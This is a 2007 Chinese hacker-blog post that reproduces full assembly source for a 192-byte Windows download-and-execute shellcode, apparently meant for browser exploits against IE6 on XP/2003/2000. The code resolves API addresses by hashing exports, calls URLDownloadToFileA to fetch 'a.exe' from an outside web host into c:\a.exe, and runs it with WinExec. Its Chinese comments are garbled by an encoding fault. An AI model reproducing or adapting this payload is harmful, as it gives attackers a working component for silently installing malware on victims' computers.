win32　Tiny　Download　and　Exec　Shellcode　192　bytes--=★－黑客天空

公告

日历

<< < 2007 - 11 > >>
日	一	二	三	四	五	六
				1	2	3
4	5	6	7	8	9	10
11	12	13	14	15	16	17
18	19	20	21	22	23	24
25	26	27	28	29	30

日志

留言

链接

信息

搜索

登陆

win32 Tiny Download and Exec Shellcode 192 bytes

Posted by 黑暗天使 2007-11-23 23:39:00

;Tiny Download&&Exec ShellCode codz czy NetSpy
;header 163=61(16+8+9+(28))+95(68+27)+17
;163+19=192
comment %
               #-----------------------------------------------------------#
               # Tiny Download&&Exec ShellCode-->        #
               #    -->size 192                                        #
               #                      2007 NetSpy                  #
               #                    codz: czy                         #
               #                  czy.9126.net                     #
               #-----------------------------------------------------------#

system :test on ie6+XPSP2/2003SP2/2kSP4
%
.586
.model flat,stdcall
option casemap:none

include     c:\masm32\include\windows.inc
include     c:\masm32\include\kernel32.inc
includelib c:\masm32\lib\kernel32.lib
include     c:\masm32\include\user32.inc
includelib c:\masm32\lib\user32.lib

.data
shelldatabuffer db 1024 dup(0)
shellcodebuffer db 2046 dup(0)
downshell db 'down exploit',0
.code
start:
invoke MessageBoxA,0,offset downshell,offset downshell,1
invoke RtlMoveMemory,offset shellcodebuffer,00401040H,256
mov eax,offset shellcodebuffer
jmp eax
somenops db 90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h
;?‰?????|?μ???′?o?????????°?‘?”???′?o?????????–???μ??shellcode?’?????ˉ?????????????–???–?′?????￡?????￡???￠???|???μ?μ??shellcode?–?′???????·???3
@@shellcodebegin:
call @@beginaddr
@@beginaddr:
PUSH 03H      ;?’?a?μ?·?“???μ??API?o?ˉ????????????
jmp @@realshellcode
myExitProcess     dd 073e2d87eh
myWinExec         dd 00e8afe98h
myLoadLibraryA    dd 0ec0e4e8eh
dll               db 'URLMON',0,0
myUrlDownFile     dd 0702f1a36h
path              db 'c:\a.exe',0
url               db 'http://czy.9126.net/a.exe',0

@@realshellcode:
    POP ECX
    POP EDI
    SCASD ;edi+4
;?μ???μ??kernel32.dll???1?μ???–?·
db 67h,64h,0A1h,30h,00h
mov eax, [eax+0cH]
mov esi, [eax+1cH]
    lodsd
mov ebp, [eax+08H]          ;EBP?–???′?|?·?…kernel32.dll?μ?????1?μ???–?·
;?′?|?€??μ???3???±?
@@next2:
PUSH      ECX
@@next3:
MOV       ESI,[EBP+3Ch]
MOV       ESI,[EBP+ESI+78h]
ADD       ESI,EBP
PUSH      ESI
MOV       ESI,[ESI+20h]
ADD       ESI,EBP
XOR       ECX,ECX
DEC       ECX
@@next:
INC       ECX
LODSD
ADD       EAX,EBP
XOR       EBX,EBX
@@again:
    MOVSX     EDX,BYTE PTR [EAX]
    CMP       DL,DH
    JZ        @@end
    ROR       EBX,0Dh
    ADD       EBX,EDX
    INC       EAX
    JMP       @@again
@@end:
CMP       EBX,[EDI]
JNZ       @@next

POP       ESI
MOV       EBX,[ESI+24h]
ADD       EBX,EBP
MOV       CX,WORD PTR [ECX*2+EBX]
MOV       EBX,[ESI+1Ch]
ADD       EBX,EBP
MOV       EAX,[ECX*4+EBX]
ADD       EAX,EBP
STOSD
POP       ECX
loop @@next2

mov ecx,[edi]   ;2
cmp cl,'c'      ;3
jz @@downfile   ;2
PUSH EDI
CALL EAX        ;2
xchg eax,ebp
scasd
scasd
push 01         ;2?μ??????????DLL?μ???o?ˉ????????????
jmp @@next3     ;2
                ;?—??????17


@@downfile:

push edx ;0
push edx ;0
push    edi ;file=c:\a.exe
lea     ecx, dword ptr [edi+9h]
push    ecx ;url
push edx ;0
call eax ;URLDownloadToFileA,0,url,file=c:\a.exe,0,0

push 1 ;FOR TEST
push edi
call dword ptr [edi-14H] ;winexec,'c:\xxx.exe',1

    call dword ptr [edi-18H] ;Exitprocess

    somenops2 db 90h,90h,90h,90h,90h,90h,90h,90h,90h
    invoke ExitProcess,0
end start

; NetSpy

阅读全文 | 回复(0) | 引用通告 | 编辑

标签：win32 Tiny Download and Exec Shellcode 192 bytes

发表评论：